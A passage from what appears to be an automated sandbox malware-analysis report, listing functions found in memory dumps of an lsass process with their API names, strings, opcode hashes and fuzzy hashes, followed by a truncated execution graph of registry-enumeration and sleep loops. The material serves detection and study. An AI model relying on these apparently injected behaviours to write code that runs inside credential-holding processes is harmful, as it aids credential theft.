                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 947c7fa1ad3ec27a09c19561f460c0d926b82a7c4141b4461b8e4805c66bb5eb
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: FD010965711762C7FBA49B2BE90C31B62B0BB4EF86F640428C95906794EF3DC14C8702
                                                        Function 000002A291998FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: e4074c3d989006062b1011126d9b052f5ce7c95440880c57faee1aa528616484
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 25517E72701622CBFBA48B1EE94CB5A2795F34AF88F648528DA564778CDF35C84DC702
                                                        Function 000002A291993044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 05c4583ffae46600bed06886ddadac808394b260982dfb2ad06563bfe6178556
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: E4F05E20704BA2C3FA808F2BBA0C11A6260AB4EFC0F648120EE5607B58DE28C54E8701
                                                        Function 000002A29199BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 532e30cbf3ed3c0db960dda60228f1adcd0baa93d67c2350fa8149c1815f2972
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 52F06261311A26C3FB548B2EE54D75B6320EB8FF61FA40219CA6B451E4DF2DC44DC302
                                                        Function 000002A2919950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: a784433245ebc767c323d0d19b128198bb02bfc69fc0680bcae65617792c778e
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 6A02BC32219B95C7F7A0CB5AF55435BB7A0F389B94F204016EA8E87B69DF78C458CB01
                                                        Function 000002A291995710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 6946616450a21ddfee37c7bd35f5e43c0242158b3216ae6897bbf5740372dcf2
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: D861AE76619A55C7F6A08B1AF54831B77A0F389B44F600116EA8E4BBA8DF7CC55CCF02
                                                        Function 000002A2911D3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 10a7772116927c9e5d22d35f01076c4d3e78c743838986f952f5529fbe920956
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: AB1186FA730A33F3FAD4151FE44D36711806F5AB74EE84629A966062D6CF28C44D4102
                                                        Function 000002A2919A4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 53c64429bb941cceb4271d550a9b971859a65673c9f7bb57f83dceafb3562638
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3011C122B10A73D3F6E6556EE65D36711807B7FBB8F3C0A24A976076D6CE24D84C8203
                                                        Function 000002A2911CF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 1bbfd92db6e95b8fc9539b16fb8632b4a2ed3b6d0598b1e6c73ff1e62b443b6d
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: A8618F36700663E3FAE59A6FE54C32B6AA2E783F40F754415CA0A037A4DF34C94DA203
                                                        Function 000002A29199AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: a73d1f298939c95b8273a44cc4430b5fd8c3e8e17c0158018733cb94f3254e73
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 50617636B01A95CBFB609F6AD68439E77A1F349B88F244215EE4917B98DF38D488C701
                                                        Function 000002A2911CA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: ae080d31f9a23d4b48301dcc4bdb2464afb26e9ddb5bb71d6685049e8a2a6eb7
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5C51D0323042A2DBEBB18B5BA45835E77A0F356F84F285116DA8987BC5DF78C45CE702
                                                        Function 000002A29199AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 83ea0d018fee459cfa53da402ecaf07e370cce6283bd230a5add074b43673c95
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: BF519F7A2002A2CBFBA48B1BD68835A77A0F35AF95F244115DA5947BD9CF38D45CC702
                                                        Function 000002A2911C8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 926694b6d52d54cb27d4976bf5ac45df6aaa9f61c1e787702c5ad3038b920f7b
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 7851E632711622E7DB94CB1AD488B2A3395F362F98F718126DA064374CEFB4D84DDB05
                                                        Function 000002A2911C83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 2aefe856cf9821ae54ee426a3807d8c36b3e988bff2276817065e4b5fdfe7aae
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 7631B031301661E7E794DF1AE88875A77A4F752F88F258019EE4A03748DF38C94DD706
                                                        Function 000002A2919A2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 307230fd63942bdd5a78379f5f9f12523036320d15212c8f65d9e8de9dc1814f
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: AFD1DD32704A91CAF751CB6AD6482AD3BB1F34AB98F244216CE5997BD9DE34C40EC341
                                                        Function 000002A2919914A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: 35b72c5b87daf49ec089226d9ca65f2f0c7e377a4a9afe8c702c47c3c1fe457c
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 9E018C36700AA1C7E784DF6BEA0814A6BA0F78EF85F644024EA5A43759DE38E05CC741
                                                        Function 000002A2919A2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 3ddf5e4ff360607ae1ad631fdafb66c63b2c3da85c3dd6b57fe440fffbc7acd3
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 4E918472710661C7F7A09F6E97583AE2BA0B74AF88F744109DE0657AD5DE34C48EC702
                                                        Function 000002A291997960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 2d278db7f6185bf4257e8498063ddb4dbc240bb3c3e343283c291c85a2a909c7
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: F3117022710F12CAFB40CF65E8583A933A4F31EB58F540E25EA6D427A4DF78D1AC8380
                                                        Function 000002A2911C9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 6f07e790c581b63989c5fc7a634458588c2cb7c78a0069fc75f04618ec94c229
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 0B617933600B99DAEB60DF6AD08439E77A0F346B88F244215EF4917B98DF38D099D702
                                                        Function 000002A291992330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 71adc9c5821356b1c1c63586a9e8c75c0363f9b6de45721788ff6ca54b5d8a1b
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: A451A1227043A2C2F6A89A2FE25C3AB5761F38EF40F640125DD5A03B4EDE39C94C8742
                                                        Function 000002A2919A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 7629f06d96b79a272e6f04d7db8bc3803aa5b6164494ce0c6112b717000e5649
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: EC41A232315A91C2EBA08F2AE6483AA77A0F79DB94F644021EE4D87798DF3CC54DC741
                                                        Function 000002A2919994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 5dd3689bbf5aff6326420e2155b0704a08a6b82fadef4d17dfd39c7e7aa88bd7
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 73112B36214B9183EBA18F1AE54435A77E5F789F94F684224EE8C07758DF3CC559CB01
                                                        Function 000002A2911C7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 93edb5fb0b132fd7271519c893dfeed14cc6724839e9e44b018e956b99003819
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: D7E08661740B55E1DF458F26E88429933A0DB5AF64F989122995C06351FF38D1FDC301
                                                        Function 000002A2911C73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: ecf5bb12e97ae8ede17a702195ef0fb2d0f2a7e240cfa2b5847f99b30a39af29
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 78E08C61B00B59E5DF468F26E88029973A0EB6AF64F989122CA4C06351FF38D1EDC301
                                                        Function 000002A291991BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 464bcb97e3c9314eea8166744373369e2b388c1d326151b7449f27b6ebef7635
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: A2116025B01B95C2FA84DB6BE50822A67A1F78EFD4F684025DE4E43769DE38D44E8301
                                                        Function 000002A291991268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 185b0546519f995496c93be5b0f86adfffaff4249d3f278c3fafc5b534794824
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 39E03939701615C7FB448B67D90834A3EE1FB8EF06F948024890907391DF7D949DC751

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14756 14e25ed1abc 14761 14e25ed1628 GetProcessHeap HeapAlloc 14756->14761 14758 14e25ed1ad2 Sleep SleepEx 14759 14e25ed1acb 14758->14759 14759->14758 14760 14e25ed1598 StrCmpIW StrCmpW 14759->14760 14760->14759 14805 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14761->14805 14763 14e25ed1650 14806 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14763->14806 14765 14e25ed1661 14807 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14765->14807 14767 14e25ed166a 14808 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14767->14808 14769 14e25ed1673 14770 14e25ed168e RegOpenKeyExW 14769->14770 14771 14e25ed18a6 14770->14771 14772 14e25ed16c0 RegOpenKeyExW 14770->14772 14771->14759 14773 14e25ed16e9 14772->14773 14774 14e25ed16ff RegOpenKeyExW 14772->14774 14809 14e25ed12bc RegQueryInfoKeyW 14773->14809 14775 14e25ed173a RegOpenKeyExW 14774->14775 14776 14e25ed1723 14774->14776 14779 14e25ed1775 RegOpenKeyExW 14775->14779 14780 14e25ed175e 14775->14780 14818 14e25ed104c RegQueryInfoKeyW 14776->14818 14784 14e25ed1799 14779->14784 14785 14e25ed17b0 RegOpenKeyExW 14779->14785 14783 14e25ed12bc 16 API calls 14780->14783 14786 14e25ed176b RegCloseKey 14783->14786 14787 14e25ed12bc 16 API calls 14784->14787 14788 14e25ed17eb RegOpenKeyExW 14785->14788 14789 14e25ed17d4 14785->14789 14786->14779 14792 14e25ed17a6 RegCloseKey 14787->14792 14790 14e25ed1826 RegOpenKeyExW 14788->14790 14791 14e25ed180f 14788->14791 14793 14e25ed12bc 16 API calls 14789->14793 14795 14e25ed184a 14790->14795 14796 14e25ed1861 RegOpenKeyExW 14790->14796 14794 14e25ed104c 6 API calls 14791->14794 14792->14785 14797 14e25ed17e1 RegCloseKey 14793->14797 14798 14e25ed181c RegCloseKey 14794->14798 14799 14e25ed104c 6 API calls 14795->14799 14800 14e25ed189c RegCloseKey 14796->14800 14801 14e25ed1885 14796->14801 14797->14788 14798->14790 14802 14e25ed1857 RegCloseKey 14799->14802 14800->14771 14803 14e25ed104c 6 API calls 14801->14803 14802->14796 14804 14e25ed1892 RegCloseKey 14803->14804 14804->14800 14805->14763 14806->14765 14807->14767 14808->14769 14810 14e25ed148a RegCloseKey 14809->14810 14811 14e25ed1327 GetProcessHeap HeapAlloc 14809->14811 14810->14774 14812 14e25ed1476 GetProcessHeap HeapFree 14811->14812 14813 14e25ed1352 RegEnumValueW 14811->14813 14812->14810 14814 14e25ed13a5 14813->14814 14814->14812 14814->14813 14816 14e25ed13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14814->14816 14817 14e25ed141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14814->14817 14823 14e25ed152c 14814->14823 14816->14817 14817->14814 14819 14e25ed11b5 